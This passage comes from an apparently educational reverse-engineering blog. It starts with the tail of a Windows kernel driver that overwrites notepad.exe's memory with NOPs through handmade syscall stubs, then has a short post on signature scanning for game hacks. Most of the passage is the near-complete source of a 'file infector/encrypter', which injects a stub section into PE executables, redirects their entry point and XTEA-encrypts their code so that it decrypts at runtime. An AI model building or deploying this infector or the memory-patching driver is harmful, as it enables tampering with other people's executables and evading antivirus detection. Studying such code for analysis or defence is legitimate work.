    ClientId.UniqueProcess = GetProcessIdFromEPROCESS(EProcess);
    ClientId.UniqueThread = NULL;
 
    Status = ZwOpenProcess(&ProcessHandle, PROCESS_ALL_ACCESS, &ObjAttributes, &ClientId);
    if(!NT_SUCCESS(Status)) {
        DbgPrint("- Could not open process %s. -- %X\n", ProcessName, Status);
        return NULL;
    }
    if(pProcess != NULL) {
        *pProcess = EProcess;
    }
    return ProcessHandle;
}
 
PVOID CreateSyscallWrapper(IN LONG Index, IN SHORT NumParameters) {
 
#ifdef _M_IX86
    SIZE_T StubLength = 0x15;
    PVOID Buffer = ExAllocatePool(NonPagedPool, StubLength);
    BYTE *SyscallIndex = ((BYTE *)Buffer) + sizeof(BYTE);
    BYTE *Retn = ((BYTE *)Buffer) + (0x13 * (sizeof(BYTE)));
    RtlCopyMemory(Buffer, SyscallTemplate, StubLength);
    NumParameters = NumParameters * sizeof(ULONG_PTR);
    RtlCopyMemory(SyscallIndex, &Index, sizeof(LONG));
    RtlCopyMemory(Retn, &NumParameters, sizeof(SHORT));
    return Buffer;
#elif defined(_M_AMD64)
    PVOID Buffer = ExAllocatePool(NonPagedPool, sizeof(SyscallTemplate));
    BYTE *NullStubAddress = &NullStub;
    BYTE *NullStubAddressIndex = ((BYTE *)Buffer) + (14 * sizeof(BYTE));
    BYTE *SyscallIndex = ((BYTE *)Buffer) + (24 * sizeof(BYTE));
    BYTE *LowBytesIndex = ((BYTE *)Buffer) + (29 * sizeof(BYTE));
    BYTE *HighBytesIndex = ((BYTE *)Buffer) + (37 * sizeof(BYTE));
    ULONG LowAddressBytes = ((ULONG_PTR)KiSystemService) & 0xFFFFFFFF;
    ULONG HighAddressBytes = ((ULONG_PTR)KiSystemService >> 32);
    RtlCopyMemory(Buffer, SyscallTemplate, sizeof(SyscallTemplate));
    RtlCopyMemory(NullStubAddressIndex, (PVOID)&NullStubAddress, sizeof(BYTE *));
    RtlCopyMemory(SyscallIndex, &Index, sizeof(LONG));
    RtlCopyMemory(LowBytesIndex, &LowAddressBytes, sizeof(ULONG));
    RtlCopyMemory(HighBytesIndex, &HighAddressBytes, sizeof(ULONG));
    return Buffer;
#endif
}
 
VOID InitializeSyscalls(VOID) {
 
#ifdef _M_IX86
    ZwSuspendProcess = (pZwSuspendProcess)CreateSyscallWrapper(0x00FD, 1);
    ZwResumeProcess = (pZwResumeProcess)CreateSyscallWrapper(0x00CD, 1);
    ZwProtectVirtualMemory = (pZwProtectVirtualMemory)CreateSyscallWrapper(0x0089, 5);
    ZwWriteVirtualMemory = (pZwWriteVirtualMemory)CreateSyscallWrapper(0x0115, 5);
#elif defined(_M_AMD64)
    ZwSuspendProcess = (pZwSuspendProcess)CreateSyscallWrapper(0x017A, 1);
    ZwResumeProcess = (pZwResumeProcess)CreateSyscallWrapper(0x0144, 1);
    ZwProtectVirtualMemory = (pZwProtectVirtualMemory)CreateSyscallWrapper(0x004D, 5);
    ZwWriteVirtualMemory = (pZwWriteVirtualMemory)CreateSyscallWrapper(0x0037, 5);
#endif
}
 
VOID FreeSyscalls(VOID) {
 
    ExFreePool(ZwSuspendProcess);
    ExFreePool(ZwResumeProcess);
    ExFreePool(ZwProtectVirtualMemory);
    ExFreePool(ZwWriteVirtualMemory);
}
 
PVOID GetProcessBaseAddress(IN PEPROCESS Process) {
 
    return PsGetProcessSectionBaseAddress(Process);
}
 
NTSTATUS WriteToProcessAddress(IN HANDLE ProcessHandle, IN PVOID BaseAddress, IN BYTE *NewBytes, IN SIZE_T NewBytesSize) {
 
    ULONG OldProtections = 0;
    SIZE_T BytesWritten = 0;
    SIZE_T NumBytesToProtect = NewBytesSize;
    NTSTATUS Status = STATUS_UNSUCCESSFUL;
 
    //Needs error checking
    Status = ZwSuspendProcess(ProcessHandle);
    Status = ZwProtectVirtualMemory(ProcessHandle, &BaseAddress, &NumBytesToProtect, PAGE_EXECUTE_READWRITE, &OldProtections);
    Status = ZwWriteVirtualMemory(ProcessHandle, BaseAddress, NewBytes, NewBytesSize, &BytesWritten);
    Status = ZwProtectVirtualMemory(ProcessHandle, &BaseAddress, &NumBytesToProtect, OldProtections, &OldProtections);
    Status = ZwResumeProcess(ProcessHandle);
 
    return STATUS_SUCCESS;
}
 
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING  RegistryPath) {
 
    PSYSTEM_MODULE KernelInfo = NULL;
    PEPROCESS Process = NULL;
    HANDLE ProcessHandle = NULL;
    PVOID BaseAddress = NULL;
    BYTE NewBytes[0x100] = {0};
    NTSTATUS Status = STATUS_UNSUCCESSFUL;
 
    DbgPrint("+ Driver successfully loaded\n");
 
    DriverObject->DriverUnload = OnUnload;
 
    KernelInfo = GetKernelModuleInfo();
    if(KernelInfo == NULL) {
        DbgPrint("Could not find kernel module\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found kernel module.\n"
        "+ Name: %s -- Base address: %p -- Size: %p\n", KernelInfo->Name,
        KernelInfo->ImageBaseAddress, KernelInfo->ImageSize);
 
    if(!NT_SUCCESS(ResolveFunctions(KernelInfo))) {
        return STATUS_UNSUCCESSFUL;
    }
 
    InitializeSyscalls();
 
    ProcessHandle = OpenProcess("notepad.exe", &Process);
    if(ProcessHandle == NULL) {
        return STATUS_UNSUCCESSFUL;
    }
    BaseAddress = GetProcessBaseAddress(Process);
    if(BaseAddress == NULL) {
        return STATUS_UNSUCCESSFUL;
    }
 
    DbgPrint("Invoking\n");
    RtlFillMemory(NewBytes, sizeof(NewBytes), 0x90);
    (VOID)WriteToProcessAddress(ProcessHandle, BaseAddress, NewBytes, sizeof(NewBytes));
    DbgPrint("+ Done\n");
 
    ExFreePool(KernelInfo);
    FreeSyscalls();
    ZwClose(ProcessHandle);
 
    return STATUS_SUCCESS;
}

May 26, 2011

Quick Post: Auto-updating with Signature Scanning

Filed under: Game Hacking,General x86,General x86-64 — admin @ 2:38 AM

One common problem with developing hacks or external modifications for games/applications is when the target application gets modified through patches, new versions, or so on. This might render offsets, structures, functions, or anything important that is used in the hack as useless if it is hardcoded. For example, assume that the hack puts a hook on a function at 0x1234ABCD. One day, a new version of the application is released and the new compiled version no longer has this function at 0x1234ABCD, but it’s at some different address, 0x12345678. Now the hack no longer works, and in the worst case, even crashes the application when used. This becomes annoying because some applications are frequently updated, which in turn requires frequent updates on the part of the hack developer. Even if the updates aren’t too frequent, it can be unnecessarily inconvenient to hunt down where the structures, functions, and so on ended up. One solution to this is called signature scanning. This technique is nothing new or special and has been used by both hack developers and anti-virus programs for many years (anti-viruses probably much longer than in hacks). It relies on finding parts of a program through scanning for certain byte patterns. For example, anti-virus programs rely partially on signature scanning when they scan files since each virus or variant can be identified with a sequence of bytes unique to it. Byte strings from scanned programs are taken and hashed. This hash is compared with known virus hashes in a database and if there is a match then there is a good chance that the application is a virus or has been infected. This of course ignores additional heuristics and scanning methods incorporated into anti-virus programs, but is still at a very basic level a key component of how they all work. This same methodology can be applied to developing game hacks or external modifications to applications in general since functions, structures, and so on also have unique byte patterns identifying them.

Shown above is part of a function that could serve as a signature. No other function in the application performs this unique set of instructions so assuming that this function does not change (the actual code within it is modified or things like new optimization settings or compilers being used) then it can always be identified with \x55\x8B\xEC\x51\x6A\x10\...\xD9\x59\x04 regardless of any updates of patches to the application. However, this technique is not without its downsides: scanning an entire file or image is costly in terms of speed. Thus, it is a pretty bad idea to develop a hack that scans an image for a signature each time it is loaded since that can slow things down a lot. What I personally do is keep an external config file that holds signatures and the offset (RVA) into the image at which they’re located. Then when a hack is loaded it can read in the config file and check that the signature exists where it’s supposed to. If it doesn’t then the hack will perform a scan on the whole image and write back into the config file where the new signature exists. This is only one way of doing it though so to each their own. Since the implementation is just searching for a substring, I feel that there’s really no need to put one here. Important things to note though for developing signature scanners:

  • Signature scanners should have some wildcard usage built in. Whether EAX, EBX and so on is used to hold a temporary value is irrelevant. For example, MOV EAX, 123 as a byte string is B823010000 and MOV EBX, 123 is BB23010000. The important part of those instructions is the 123 immediate value, so the B8 or BB byte is irrelevant. The signature can then be \x??\x23\x01\x00\x00. How \x?? is treated is implementation dependent.
  • Usually the most important parts of a signature are any references to other code, structures, local variables, etc. Getting a signature containing these will increase the chance of it being found. However, references to other code is a bit dangerous since relative distances can change between new versions of a target application.
  • A signature, by definition, should be unique. Using PUSH EBP ; MOV EBP, ESP is a bad idea.

A downloadable PDF of this post can be found here.

April 23, 2011

Writing a File Infector/Encrypter: Full Source Code and Remarks (4/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

The full source code is reproduced below. The archive at the end of this post contains the source code and a compiled executable. 

Main.cpp

#include <Windows.h>
#include <wchar.h>
#include <stdio.h>
#include "Injector.h"
#include "Encrypter.h"
 
#define BB(x) __asm _emit x
 
#define STRING_COMPARE(str1, str2) \
    __asm push str1 \
    __asm call get_string_length \
    __asm push eax \
    __asm push str1 \
    __asm mov eax, str2 \
    __asm push eax \
    __asm call strings_equal
 
#pragma code_seg(".inject")
void __declspec(naked) injection_stub(void) {
    __asm { //Prologue, stub entry point
        pushad                  //Save context of entry point
        push ebp                //Set up stack frame
        mov ebp, esp
        sub esp, 0x200          //Space for local variables
 
    }
    PIMAGE_DOS_HEADER target_image_base;
    PIMAGE_DOS_HEADER kernel32_image_base;
    __asm {
        call get_module_list    //Get PEB
        mov ebx, eax
        push 0
        push ebx
        call get_dll_base       //Get image base of process
        mov [target_image_base], eax
        push 2
        push ebx
        call get_dll_base       //Get kernel32.dll image base
        mov [kernel32_image_base], eax
    }
    __asm { //Decrypt all sections
        push kernel32_image_base
        push target_image_base
        call decrypt_sections
    }
    //Any additional code can go here
    __asm { //Epilogue, stub exit point
        mov eax, target_image_base
        add eax, 0xCCDDEEFF     //Signature to be replaced by original entry point (OEP)
        mov esp, ebp
        mov [esp+0x20], eax     //Store OEP in EAX through ESP to preserve across popad
        pop ebp
        popad                   //Restore thread context, with OEP in EAX
        jmp eax                 //Jump to OEP
    }
 
    ///////////////////////////////////////////////////////////////////
    //Gets the module list
    //Preserves no registers, PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList returned in EAX
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_module_list:       
            mov eax, fs:[0x30]  //PEB
            mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA
            mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList
            retn
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Gets the DllBase member of the InLoadOrderModuleList structure
    //Call as void *get_dll_base(void *InLoadOrderModuleList, int index)
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_dll_base:
        push ebp
        mov ebp, esp
        cmp [ebp+0xC], 0x0      //Initial zero check
        je done
        mov ecx, [ebp+0xC]      //Set loop index
        mov eax, [ebp+0x8]      //PEB->PPEB_LDR_DATA->InLoadOrderModuleList address
        traverse_list:
            mov eax, [eax]      //Go to next entry
        loop traverse_list
        done:
            mov eax, [eax+0x18] //PEB->PPEB_LDR_DATA->InLoadOrderModuleList.DllBase
            mov esp, ebp
            pop ebp
            ret 0x8
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Gets the length of the string passed as the parameter
    //Call as int get_string_length(char *str)
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_string_length:
        push ebp
        mov ebp, esp
        mov edi, [ebp+0x8]      //String held here
        mov eax, 0x0            //EAX holds size of the string
        counting_loop:
            cmp byte ptr[edi], 0x0//Current byte is null-terminator?
            je string_done      //Done, leave loop
            inc edi             //Go to next character
            inc eax             //size++
            jmp counting_loop
        string_done:
            mov esp, ebp
            pop ebp
            retn
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //String comparison function, checks for equality of two strings
    //Call as bool strings_equal(char *check_string, char *known_string, int known_string_length)
    ///////////////////////////////////////////////////////////////////
    __asm {
    strings_equal:
        push ebp
        mov ebp, esp
        mov eax, 0x0            //Assume unequal
        cld                     //Forward comparison
        mov esi, [ebp+0x8]      //ESI gets check_string
        mov edi, [ebp+0xC]      //EDI gets known_string
        mov ecx, [ebp+0x10]     //ECX gets known_string_length
        repe cmpsb              //Start comparing
        jne end
        mov eax, 0x1            //Strings equal
    end:
        mov esp, ebp
        pop ebp
        ret 0xC
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Implementation of GetProcAddress
    //Call as FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
    ///////////////////////////////////////////////////////////////////
    get_proc_address:
        __asm {
            push ebp
            mov ebp, esp
            sub esp, 0x200
        }
        PIMAGE_DOS_HEADER kernel32_dos_header;
        PIMAGE_NT_HEADERS kernel32_nt_headers;
        PIMAGE_EXPORT_DIRECTORY kernel32_export_dir;
        unsigned short *ordinal_table;
        unsigned long *function_table;
        FARPROC function_address;
        int function_names_equal;
        __asm { //Initializations
            mov eax, [ebp+0x8]
            mov kernel32_dos_header, eax
            mov function_names_equal, 0x0
        }
        kernel32_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)kernel32_dos_header + kernel32_dos_header->e_lfanew);
        kernel32_export_dir = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)kernel32_dos_header + 
            kernel32_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
        for(unsigned long i = 0; i < kernel32_export_dir->NumberOfNames; ++i) {
            char *eat_entry = (*(char **)((DWORD_PTR)kernel32_dos_header + kernel32_export_dir->AddressOfNames + i * sizeof(DWORD_PTR)))
                + (DWORD_PTR)kernel32_dos_header;   //Current name in name table
            STRING_COMPARE([ebp+0xC], eat_entry) //Compare function in name table with the one we want to find
            __asm mov function_names_equal, eax
            if(function_names_equal == 1) {
                ordinal_table = (unsigned short *)(kernel32_export_dir->AddressOfNameOrdinals + (DWORD_PTR)kernel32_dos_header);
                function_table = (unsigned long *)(kernel32_export_dir->AddressOfFunctions + (DWORD_PTR)kernel32_dos_header);
                function_address = (FARPROC)((DWORD_PTR)kernel32_dos_header + function_table[ordinal_table[i]]);
                break;
            }
        }
        __asm {
            mov eax, function_address
            mov esp, ebp
            pop ebp
            ret 0x8
        }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Decrypts all sections in the image, excluding .rdata/.rsrc/.inject
    //Call as void decrypt_sections(void *image_base, void *kernel32_base)
    ///////////////////////////////////////////////////////////////////
    decrypt_sections:
        __asm {
            push ebp
            mov ebp, esp
            sub esp, 0x200
        }
        typedef BOOL (WINAPI *pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect,
            PDWORD lpflOldProtect);
        char *str_virtualprotect;
        char *str_section_name;
        char *str_rdata_name;
        char *str_rsrc_name;
        PIMAGE_DOS_HEADER target_dos_header;
        int section_offset;
        int section_names_equal;
        unsigned long old_protections;
        pVirtualProtect virtualprotect_addr;
        __asm { //String initializations
            jmp virtualprotect
            virtualprotectback:
                pop esi
                mov str_virtualprotect, esi
            jmp section_name
            section_nameback:
                pop esi
                mov str_section_name, esi
            jmp rdata_name
            rdata_nameback:
                pop esi
                mov str_rdata_name, esi
            jmp rsrc_name
            rsrc_nameback:
                pop esi
                mov str_rsrc_name, esi
        }
        __asm { //Initializations
            mov eax, [ebp+0x8]
            mov target_dos_header, eax
            mov section_offset, 0x0
            mov section_names_equal, 0x0
            push str_virtualprotect
            push [ebp+0xC]
            call get_proc_address
            mov virtualprotect_addr, eax
        }
        PIMAGE_NT_HEADERS target_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)target_dos_header + target_dos_header->e_lfanew);
        for(unsigned long j = 0; j < target_nt_headers->FileHeader.NumberOfSections; ++j) {
            section_offset = (target_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS) +
                (sizeof(IMAGE_SECTION_HEADER) * j));
            PIMAGE_SECTION_HEADER section_header = (PIMAGE_SECTION_HEADER)((DWORD_PTR)target_dos_header + section_offset);
            STRING_COMPARE(str_section_name, section_header)
            __asm mov section_names_equal, eax
            STRING_COMPARE(str_rdata_name, section_header)
            __asm add section_names_equal, eax
            STRING_COMPARE(str_rsrc_name, section_header)
            __asm add section_names_equal, eax
            if(section_names_equal == 0) {
                unsigned char *current_byte = 
                    (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress);
                unsigned char *last_byte = 
                    (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress 
                    + section_header->SizeOfRawData);
                const unsigned int num_rounds = 32;
                const unsigned int key[4] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
                for(current_byte; current_byte < last_byte; current_byte += 8) {
                    virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, PAGE_EXECUTE_READWRITE, &old_protections);
                    unsigned int block1 = (*current_byte << 24) | (*(current_byte+1) << 16) |
                        (*(current_byte+2) << 8) | *(current_byte+3);
                    unsigned int block2 = (*(current_byte+4) << 24) | (*(current_byte+5) << 16) |
                        (*(current_byte+6) << 8) | *(current_byte+7);
                    unsigned int full_block[] = {block1, block2};
                    unsigned int delta = 0x9E3779B9;
                    unsigned int sum = (delta * num_rounds);
                    for (unsigned int i = 0; i < num_rounds; ++i) {
                        full_block[1] -= (((full_block[0] << 4) ^ (full_block[0] >> 5)) + full_block[0]) ^ (sum + key[(sum >> 11) & 3]);
                        sum -= delta;
                        full_block[0] -= (((full_block[1] << 4) ^ (full_block[1] >> 5)) + full_block[1]) ^ (sum + key[sum & 3]);
                    }
                    virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, old_protections, NULL);
                    *(current_byte+3) = (full_block[0] & 0x000000FF);
                    *(current_byte+2) = (full_block[0] & 0x0000FF00) >> 8;
                    *(current_byte+1) = (full_block[0] & 0x00FF0000) >> 16;
                    *(current_byte+0) = (full_block[0] & 0xFF000000) >> 24;
                    *(current_byte+7) = (full_block[1] & 0x000000FF);
                    *(current_byte+6) = (full_block[1] & 0x0000FF00) >> 8;
                    *(current_byte+5) = (full_block[1] & 0x00FF0000) >> 16;
                    *(current_byte+4) = (full_block[1] & 0xFF000000) >> 24;
                }
            }
            section_names_equal = 0;
        }
        __asm {
            mov esp, ebp
            pop ebp
            ret 0x8
        }
 
    __asm {
    virtualprotect:
        call virtualprotectback
        BB('V') BB('i') BB('r') BB('t') BB('u') BB('a') BB('l')
        BB('P') BB('r') BB('o') BB('t') BB('e') BB('c') BB('t') BB(0)
    rdata_name:
        call rdata_nameback
        BB('.') BB('r') BB('d') BB('a') BB('t') BB('a') BB(0)
    rsrc_name:
        call rsrc_nameback
        BB('.') BB('r') BB('s') BB('r') BB('c') BB(0)
    section_name:
        call section_nameback
        BB('.') BB('i') BB('n') BB('j') BB('e') BB('c') BB('t') BB(0)
        int 0x3                 //Function signature
        int 0x3
        int 0x3
        int 0x3
    }
}
#pragma code_seg()
#pragma comment(linker, "/SECTION:.inject,re")
 
wchar_t *convert_to_unicode(char *str, unsigned int length) {
    wchar_t *wstr;
    int wstr_length = MultiByteToWideChar(CP_ACP, 0, str, (length + 1), NULL, 0);
    wstr = (wchar_t *)malloc(wstr_length * sizeof(wchar_t));
    wmemset(wstr, 0, wstr_length);
    if (wstr == NULL)
        return NULL;
    int written = MultiByteToWideChar(CP_ACP, 0, str, length, wstr, wstr_length);
    if(written > 0)
        return wstr;
    return NULL;
}
 
int main(int argc, char* argv[]) {
    if(argc != 2) {
        printf("Usage: ./%s <target>\n", argv[0]);
        return -1;
    }
    wchar_t *target_file_name = convert_to_unicode(argv[1], strlen(argv[1]));
    if(target_file_name == NULL) {
        printf("Could not convert %s to unicode\n", argv[1]);
        return -1;
    }
    pfile_info target_file = file_info_create();
    void (*stub_addr)(void) = injection_stub;
    unsigned int stub_size = get_stub_size(stub_addr);
    unsigned int stub_size_aligned = 0;
    bool map_file_success = map_file(target_file_name, stub_size, false, target_file);
    if(map_file_success == false) {
        wprintf(L"Could not map target file\n");
        return -1;
    }
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)target_file->file_mem_buffer;
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    stub_size_aligned = align_to_boundary(stub_size, nt_headers->OptionalHeader.SectionAlignment);
    const char *section_name = ".inject";
    file_info_destroy(target_file);
    target_file = file_info_create();
    (void)map_file(target_file_name, stub_size_aligned, true, target_file);
    PIMAGE_SECTION_HEADER new_section = add_section(section_name, stub_size_aligned, target_file->file_mem_buffer);
    if(new_section == NULL) {
        wprintf(L"Could not add new section to file");
        return -1;
    }
    write_stub_entry_point(nt_headers, stub_addr);
    copy_stub_instructions(new_section, target_file->file_mem_buffer, stub_addr);
    change_file_oep(nt_headers, new_section);
    encrypt_file(nt_headers, target_file, section_name);
    int flush_view_success = FlushViewOfFile(target_file->file_mem_buffer, 0);
    if(flush_view_success == 0)
        wprintf(L"Could not save changes to file");
    file_info_destroy(target_file);
    return 0;
}

Injector.cpp

#include "Injector.h"
#include <stdio.h>
 
//Assumes malloc won't fail
pfile_info file_info_create(void) {
    pfile_info mapped_file_info = (pfile_info)malloc(sizeof(file_info));
    memset(mapped_file_info, 0, sizeof(file_info));
    return mapped_file_info;
}
 
//Assumes everything is valid, doesn't report error code
void file_info_destroy(pfile_info mapped_file_info) {
    if(mapped_file_info->file_mem_buffer != NULL)
        UnmapViewOfFile(mapped_file_info->file_mem_buffer);
    if(mapped_file_info->file_handle != NULL)
        CloseHandle(mapped_file_info->file_handle);
    if(mapped_file_info->file_map_handle != NULL)
        CloseHandle(mapped_file_info->file_map_handle);
    free(mapped_file_info);
    mapped_file_info = NULL;
}
 
inline unsigned int align_to_boundary(unsigned int address, unsigned int boundary) {
	return (((address + boundary - 1) / boundary) * boundary);
}
unsigned int get_stub_size(void* stub_addr) {
    unsigned int size = 0;
    if(stub_addr != NULL) {
        const char *stub_signature = "\xCC\xCC\xCC\xCC";
        while(memcmp(((unsigned char *)stub_addr + size), stub_signature, sizeof(int)) != 0)
            ++size;
    }
    return size;
}
 
bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info) {
    void *file_handle = CreateFile(file_name, GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file_handle == INVALID_HANDLE_VALUE) {
        wprintf(L"Could not open %s", file_name);
        return false;
    }
    unsigned int file_size = GetFileSize(file_handle, NULL);
    if(file_size == INVALID_FILE_SIZE) {
        wprintf(L"Could not get file size for %s", file_name);
        return false;
    }
    if(append_mode == true) {
        file_size += (stub_size + sizeof(DWORD_PTR));
    }
    void *file_map_handle = CreateFileMapping(file_handle, NULL, PAGE_READWRITE, 0,
        file_size, NULL);
    if(file_map_handle == NULL) {
        wprintf(L"File map could not be opened");
        CloseHandle(file_handle);
        return false;
    }
    void *file_mem_buffer = MapViewOfFile(file_map_handle, FILE_MAP_WRITE, 0, 0, file_size);
    if(file_mem_buffer == NULL) {
        wprintf(L"Could not map view of file");
        CloseHandle(file_map_handle);
        CloseHandle(file_handle);
        return false;
    }
    mapped_file_info->file_handle = file_handle;
    mapped_file_info->file_map_handle = file_map_handle;
    mapped_file_info->file_mem_buffer = (unsigned char*)file_mem_buffer;
    return true;
}
 
//Reference: http://www.codeproject.com/KB/system/inject2exe.aspx
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr) {
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)image_addr;
    if(dos_header->e_magic != 0x5A4D) {
        wprintf(L"Could not retrieve DOS header from %p", image_addr);
        return NULL;
    }
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    if(nt_headers->OptionalHeader.Magic != 0x010B) {
        wprintf(L"Could not retrieve NT header from %p", dos_header);
        return NULL;
    }
    const int name_max_length = 8;
    PIMAGE_SECTION_HEADER last_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections - 1);
    PIMAGE_SECTION_HEADER new_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections);
    memset(new_section, 0, sizeof(IMAGE_SECTION_HEADER));
    new_section->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;
    memcpy(new_section->Name, section_name, name_max_length);
    new_section->Misc.VirtualSize = section_size;
    new_section->PointerToRawData = align_to_boundary(last_section->PointerToRawData + last_section->SizeOfRawData,
        nt_headers->OptionalHeader.FileAlignment);
    new_section->SizeOfRawData = align_to_boundary(section_size, nt_headers->OptionalHeader.SectionAlignment);
    new_section->VirtualAddress = align_to_boundary(last_section->VirtualAddress + last_section->Misc.VirtualSize,
        nt_headers->OptionalHeader.SectionAlignment);
    nt_headers->OptionalHeader.SizeOfImage =  new_section->VirtualAddress + new_section->Misc.VirtualSize;
    nt_headers->FileHeader.NumberOfSections++;
    return new_section;
}
 
void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr) {
    unsigned int stub_size = get_stub_size(stub_addr);
    memcpy(((unsigned char *)image_addr + section->PointerToRawData), stub_addr, stub_size);
}
 
void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section) {
    unsigned int file_address = section->PointerToRawData;
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        if(file_address >= current_section->PointerToRawData &&
            file_address < (current_section->PointerToRawData + current_section->SizeOfRawData)){
                file_address -= current_section->PointerToRawData;
                file_address += (nt_headers->OptionalHeader.ImageBase + current_section->VirtualAddress);
                break;
        }
    ++current_section;
    }
    nt_headers->OptionalHeader.AddressOfEntryPoint =  file_address - nt_headers->OptionalHeader.ImageBase;
}
 
void write_stub_entry_point(PIMAGE_NT_HEADERS nt_headers, void *stub_addr) {
    if(stub_addr != NULL) {
        const char *signature = "\xFF\xEE\xDD\xCC";
        unsigned int index = 0;
        while(memcmp(((unsigned char *)stub_addr + index), signature, sizeof(int)) != 0) {
            ++index;
        }
        DWORD old_protections = 0;
        VirtualProtect(((unsigned char *)stub_addr + index), sizeof(DWORD), PAGE_EXECUTE_READWRITE, &old_protections);
        memcpy(((unsigned char *)stub_addr + index), &nt_headers->OptionalHeader.AddressOfEntryPoint, sizeof(DWORD));
        VirtualProtect(((unsigned char *)stub_addr + index), sizeof(DWORD), old_protections, NULL);
    }
}

Injector.h

#pragma once
#include <Windows.h>
 
typedef struct {
    void *file_handle;
    void *file_map_handle;
    unsigned char *file_mem_buffer;
} file_info, *pfile_info;
 
pfile_info file_info_create(void);
void file_info_destroy(pfile_info mapped_file_info);
unsigned int align_to_boundary(unsigned int address, unsigned int boundary);
unsigned int get_stub_size(void* stub_addr);
bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info);
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr);
void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr);
void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section);
void write_stub_entry_point(PIMAGE_NT_HEADERS nt_headers, void *stub_addr);

Encrypter.cpp

#include "Encrypter.h"
#include <stdio.h>
 
void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name) {
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    const char *excluded_sections[] = {".rdata", ".rsrc", excluded_section_name};
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        int excluded = 1;
        for(int j = 0; j < sizeof(excluded_sections)/sizeof(excluded_sections[0]); ++j)
            excluded &= strcmp(excluded_sections[j], (char *)current_section->Name);
        if(excluded != 0) {
            unsigned char *section_start = 
                (unsigned char *)target_file->file_mem_buffer + current_section->PointerToRawData;
            unsigned char *section_end = section_start + current_section->SizeOfRawData;
            const unsigned int num_rounds = 32;
            const unsigned int key[] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
            for(unsigned char *k = section_start; k < section_end; k += 8) {
                unsigned int block1 = (*k << 24) | (*(k+1) << 16) | (*(k+2) << 8) | *(k+3);
                unsigned int block2 = (*(k+4) << 24) | (*(k+5) << 16) | (*(k+6) << 8) | *(k+7);
                unsigned int full_block[] = {block1, block2};
                encrypt(num_rounds, full_block, key);
                full_block[0] = swap_endianess(full_block[0]);
                full_block[1] = swap_endianess(full_block[1]);
                memcpy(k, full_block, sizeof(full_block));
            }
        }
        current_section++;
    }
}
 
//Encryption/decryption routines modified from http://en.wikipedia.org/wiki/XTEA
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int sum = 0;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        blocks[0] += (((blocks[1] << 4) ^ (blocks[1] >> 5)) + blocks[1]) ^ (sum + key[sum & 3]);
        sum += delta;
        blocks[1] += (((blocks[0] << 4) ^ (blocks[0] >> 5)) + blocks[0]) ^ (sum + key[(sum >> 11) & 3]);
    }
}
 
//Unused, kept for testing/verification
void decrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int sum = delta * num_rounds;
